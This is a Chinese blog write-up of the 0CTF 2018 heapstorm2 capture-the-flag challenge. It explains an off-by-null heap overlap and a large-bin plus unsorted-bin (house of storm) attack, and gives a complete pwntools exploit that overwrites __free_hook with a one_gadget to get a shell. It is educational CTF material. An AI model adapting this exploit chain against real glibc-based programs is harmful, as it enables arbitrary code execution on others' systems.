0ctf2018_heapstorm2 wp

最新推荐文章于 2024-01-23 19:54:43 发布
最新推荐文章于 2024-01-23 19:54:43 发布
阅读量368 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44008345/article/details/130032096
版权

0ctf2018_heapstorm2

题目概述

主要参考这个 Sakuraのblog

流程就是 mallpt 关闭 fastbin 分配,mmap 一块内存,用随机数初始化,然后在上面放结构体数组,这意味着如果要 malloc 到数组上修改指针的话,chunk size 的M标志位要为1。

程序功能有 allocate,update,delete,view,分配的 size 要大于 12 小于 4096 ,update 中存在一个 off by null,delete 没有 UAF,view 要求 mmap 地址上的数据满足一个条件,所以大体的思路是要有:任意地址写任意数,然后利用 off by null 构造堆块重叠改函数指针。

步骤分解

off by null

就是很常规的手法,申请一个大块,两头夹一个小块,伪造加的下一个块的 prev_size 绕过 unlink 的检查:

    alloc(0x18)  #0
    alloc(0x508) #1
    alloc(0x18)  #2
    update(1, b'a' * 0x4f0 + p64(0x500))

free 掉大块 1,用 off by null 改 free chunk 的 size 最后一个字节为 00 ,在 1 里申请两个块让 3 居中:

    free(1)
    update(0, b'a' * (0x18 - 12))
    alloc(0x18)  #1
    alloc(0x4d8) #3

free 掉 1 和 2 进行 unlink 合并,再次分配 1 和 2 时, 2 的头部已经在 3 的数据区,3 的头部在 1 的数据区:

    free(1)
    free(2) # 1 merge with 2
    alloc(0x38)  #1
    alloc(0x4e8) #2

同理再次实现一次上述操作后通过 malloc 和 free ,实现一个较大的块在 unsorted bin 中,一个稍小的块在 large bin 中。

large bin attack

要满足 view 的条件,我们需要在 0x13370800 附近伪造一个 fake chunk ,考虑到后续 unsorted bin attack 申请这个 fake chunk ,我们需要 large bin attack 伪造这个 fake chunk 的 size 位:

    array = 0x13370800
    fake_chunk = array - 0x20
    # 对 large bin 中的块:
    payload = p64(0) * 4 
    payload += p64(0) + p64(0x4f1) #size
    payload += p64(0) + p64(fake_chunk + 8) #bk
    payload += p64(0) + p64(fake_chunk - 0x18 + 5) #bk_nextsize
    update()

此时 large bin 中的块已被修改,最后的 fake_chunk - 0x18 + 5 可以刚好让的 fake chunk 的 size 域被写入堆地址的最高非零字节,由于开启了 aslr ,并且申请的块在 mmap 里,需要 chunk 的 m 位为 1,所以堆块地址要以 0x56开头,这样才能用 alloc(0x48) 申请一个 0x50 大小的块。

unsorted bin into mmap

改 unsorted bin chunk 的 bk 为 fake chunk 地址,申请堆块时先把 chunk 放入 large bin 造成 large bin attack,然后再申请 fake chunk ,只有一定的成功率:

    payload = p64(0) * 2
    payload += p64(0) + p64(0x4f1) #size
    payload += p64(0) + p64(fake_chunk) #bk
    update()
    try:
        alloc(0x48)
    except EOFError:
        p.close()
        continue

泄露 libc ,改 __free_hook

利用申请到的 mmap 上的堆块,update 改随机数为 0 和 0x13377331,并把数组中存放的堆块指针改成数组地址和 large bin attack 写入的堆块地址,泄露 libc ,改 free_hook 为 one_gadget 。

EXP

from pwn import *
context.log_level = 'debug'

def alloc(size):
    p.sendline('1')
    p.recvuntil('Size: ')
    p.sendline(str(size))
    p.recvuntil('Command: ')

def update(idx, content):
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline('%d' % idx)
    p.recvuntil('Size: ')
    p.sendline('%d' % len(content))
    p.recvuntil('Content: ')
    p.send(content)
    p.recvuntil('Command: ')

def free(idx):
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline('%d' % idx)
    p.recvuntil('Command: ')

def view(idx):
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline('%d' % idx)
    mes = p.recvuntil('Command: ')
    pos1 = mes.find(b']: ') + len(']: ')
    pos2 = mes.find(b'\n1. ')
    return mes[pos1:pos2]

while True:
    p = process('./0ctf_2018_heapstorm2')
    libc = ELF('./libc-2.23.so')
        
    p.recvuntil('Command: ')

    alloc(0x18)     #0
    alloc(0x508)    #1
    alloc(0x18)     #2
    update(1, b'a' * 0x4f0 + p64(0x500)) 

    alloc(0x18)     #3
    alloc(0x508)    #4
    alloc(0x18)     #5
    update(4, b'a' * 0x4f0 + p64(0x500)) 
    alloc(0x18)     #6

    free(1)
    update(0, b'a' * (0x18 - 12))    #off-by-one
    alloc(0x18)     #1
    alloc(0x4d8)    #7
    free(1)
    free(2)         
    alloc(0x38)     #1
    alloc(0x4e8)    #2

    free(4)
    update(3, b'a' * (0x18 - 12))    #off-by-one
    alloc(0x18)     #4
    alloc(0x4d8)    #8
    free(4)
    free(5)   
    alloc(0x48)     #4

    free(2)
    alloc(0x4e8)    #2
    free(2)

    array = 0x13370800
    fake_chunk = array - 0x20

    payload = p64(0) * 2 
    payload += p64(0) + p64(0x4f1)           #size
    payload += p64(0) + p64(fake_chunk)      #bk
    update(7, payload)

    payload = p64(0) * 4 
    payload += p64(0) + p64(0x4e1)               #size
    payload += p64(0) + p64(fake_chunk+8)        #bk
    payload += p64(0) + p64(fake_chunk-0x18-5)   #bk_nextsize
    update(8, payload)

    try:
        alloc(0x48)     #2
    except EOFError:
        p.close()
        continue

    payload = p64(0)*2 + p64(0) + p64(0) + p64(0) + p64(0x13377331) + p64(array)
    update(2, payload)

    payload = p64(0) + p64(0) + p64(0) + p64(0x13377331) + p64(array) + p64(0x1000) + p64(array - 0x20 + 3) + p64(8)
    update(0, payload)
    heap = u64(view(1))

    payload = p64(0) + p64(0) + p64(0) + p64(0x13377331) + p64(array) + p64(0x1000) + p64(heap + 0x10) + p64(8)
    update(0, payload)
    unsorted_bin = u64(view(1))
    
    libc_base = unsorted_bin - 0x3c4b78
    free_hook = libc_base + libc.symbols['__free_hook']
    one_gadget = libc_base + 0x4527a

    payload = p64(0) + p64(0) + p64(0) + p64(0x13377331) + p64(array) + p64(0x1000) + p64(free_hook) + p64(0x100)
    update(0, payload)
    update(1, p64(one_gadget))
    
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline('2')
    break

p.interactive()
_Picasso_
关注
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)
weixin_44145820的博客
04-25 1765
目录题目分析漏洞利用Exp 题目分析 这题估计是house of storm利用的起源? 因为用这种办法直接就可以做通,后面还有rctf_2019_babyheap也需要用到house of storm,但是那题限制条件多多了 init()里先把fastbin禁用了 申请了0x13370000这块内存,并且做了初始化 初始化首先读入长度为0x18的随机数,就记为3个long long随机数吧...
0ctf-2018 heapstorm2详解
极目楚天舒的博客
05-20 2226
0x01 预备知识堆相关的数据结构通过malloc得到的我们称之为chunk,每一个chunk都有一个chunk头用于管理称之为malloc_chunk,定义如下:/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing a...
pwn challenge】0ctf_2018_heapstorm2
weixin_43960998的博客
03-02 517
程序 很早以前就想把这题做了,但是感觉特别麻烦就一直拖着了,今日参考了一位师傅然后解决。 程序先是禁用了 fastbin,让你和 mmap 了一段内存,并往该内存中读取了一串随机数,然后进行一个简单的赋值,接着通过一个 for 循环将接下来用到的存放 ptr 和 size 的地方进行了异或操作: 最终是如下效果: 然后是添加堆块功能: 利用 calloc 分配,会清空原堆块的内容,这就需要 overlap 的时候对其中的 chunk header 等进行恢复。 update 功能中存在 off b
0ctf2018_heapstorm2_reproduce
Gtooler的博客
02-23 371
0ctf2018_heapstorm2_reproduce 概述 打了好久,学到很多 保护全开,libc-2.24 漏洞点在 off-by-one,打法是利用 off-by-one 缩小 chunk 进行 unlink 然后就可以实现类似 uaf 的 overlap,是 unlink 的一部分,又是还能用的这种 overlap 有了 overlap 就能实现 house of storm,也就是同时伪造 large_bin 的 bk_nextsize 和 bk 与 unsorted_bin 的 bk,实现
0ctf_2018_heapstorm2 && rctf_2019_babyheap
qq_73149934的博客
06-14 254
分配合适的chunk,unsortedbin 剩余的一个chunk(0x4e1)是我们需要的largebin chunk,此时处于释放状态。这看似没有问题,但是注意,strcpy函数会在末尾加上null,相当于13个字节,发生了off by null。2.23-0ubuntu11house of storm,poison null byte,堆风水,堆orw。分配合适的chunk,chunk2是unsorted chunk(0x4f1),此时处于分配状态。同时,mallopt函数禁用了fastbin。
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1635
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
rctf_2019_babyheap、0ctf_2018_heapstorm2学习(house of storm)
weixin_46521144的博客
09-10 1574
0ctf_2018_heapstorm2 这道题算是house of storm的起源。 house of storm的原理其实就是:结合利用largebin attack和劫持unsortedbin后一个chunk的bk,实现把堆地址写入到任意地址,再结合unsortedbin的bk指针分配时只检查size而不检查chunk完整性(这里有点疑惑,unlink检查应该很严格,可能是绕过了而不是没有检查)分配到这个地址上(add(0x48))实现的结果和unlink差不多。 具体利用条件: glibc2.3
逆向学习(一) 加密算法
One_p_Two_w的博客
10-24 600
逆向学习(一) 加密算法 前言 作为一个学校课程学不明白,ctf没有队友并且只会签到pwn题的pwn手,今天,准备开新坑了! (你pwn还是个菜鸡呢怎么就要开新坑了) 以下内容主要是根据wiki进行的整理。 正题 Base64 ​ base64大家肯定都很熟悉,毕竟实在是太知名了,不过以往咱都是b64encode()和Baidu:base64。从未了解过原理,属实惭愧,借着入坑逆向的机会,记录一下base64的加密原理 ​ Base64 是一种基于 64 个可打印字符来表示二进制数据的表示方法。 ​ 64个
(BUUCTF0ctf_2018_heapstorm2
最新发布
xy1458214551的博客
01-23 706
BUUCTF0ctf_2018_heapstorm2题解
20180CTF g0g0g0 writeup
ACdream
04-24 2654
一道很好的题目,从逆向到数学密码到工具贴几个writeup吧,比较难找:https://www.jianshu.com/p/d906619a01b7https://github.com/xiaohuajiao/my-ctf/tree/master/2018/0ctf/g0g0g0http://westerns.tokyo/writeups/0ctf2018quals.html#g0g0g0上面的链...
0CTF 2018 Quals Bl0g writeup
3569
04-12 807
记录:之前没有做,看着wp稍做了解,复现一遍了解CSP限制虽然刚开始是绕过CSP,但是我觉得绕过和没有绕过没什么区别。0.0Content-Security-Policy: script-src 'self' 'unsafe-inline' Content-Security-Policy: default-src 'none'; script-src 'nonce-BXwvkDpdui1nFUwI...
House of storm
tbsqigongzi的博客
08-05 879
结合了unsorted_bin_attack和Largebin_attack的攻击技术,实现任意地址分配chunk,任意地址写。
buuoj Pwn writeup 166-170
yongbaoii的博客
06-03 296
166 picoctf_2018_echo back 167 168 169 170
UnsortedBin Attack
yms0211的博客
09-13 1129
Unsorted Bin Attack
How2heap--UnsortedbinAttack(by glibc-2.23)
m0_56642842的博客
07-21 308
UnsortedbinAttack.c 源码 调试分析 1.首先定义了一个变量,存放在栈上 2.然后malloc一个0x400大小的chunk p 3.为了防止在下一次执行free的时候 chunk p 被consolidate合并到 top chunk 中,这里再申请一个0x500大小的chunk。 4.然后将chunk p free掉, 注意这里, chunk p被放到了unsortedbin中,且fd和bk指针都指向main_arena+88 然后我们改写chunk p的bk指针。 需要
0CTF 2018 BabyHeap
Bill
04-15 1128
0CTF 2018 Babyheap 前言 上周0CTF临危受命,就做出一道题, 感觉思路很新颖, 分享一下. 题目分析 1. checksec Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: ...
0ctf2018 babystack学习return to dl-resolve
极目楚天舒的博客
05-06 1884
0x01程序分析首先查看main函数,比较简单,调用了alarm和sub_80483B,进入sub_80483B看看。sub_80483B的作用是读取0x40个字节到ebp-40处,这里显然存在栈溢出漏洞。发现只开了一个栈不可执行,于是想构造rop链。但是整个文件搜索下来也没有发现什么有价值的gadget。0x02  return to dl-resolve知识学习玩过pwn的赛棍都知道,pwn题...
large bin attack & house of strom
seaaseesa的博客
06-12 1301
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
0ctf2017-babyheap
weixin_30878361的博客
08-03 352
前言 又是一道令人怀疑人生的 baby 题。 这道题利用思路非常巧妙,通过 堆溢出 和 fastbin 的机制构造了 information leak, 然后通过 fastbin attack 可以读写 malloc_hook , 然后使用 one_gadget 来 getshell. 题目和 idb 文件:https://gitee.com/hac425/blog_data/tree/maste...
CTF_snow_隐写工具:CTF比赛必备神器
2. 简易使用:CTF_snow_隐写工具可能设计得简洁易用,以便于CTF参赛者快速掌握并运用到比赛过程中。 3. 可视化界面:为提高易用性,工具可能具备图形用户界面(GUI),允许用户通过点击和拖拽的方式进行隐写操作。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值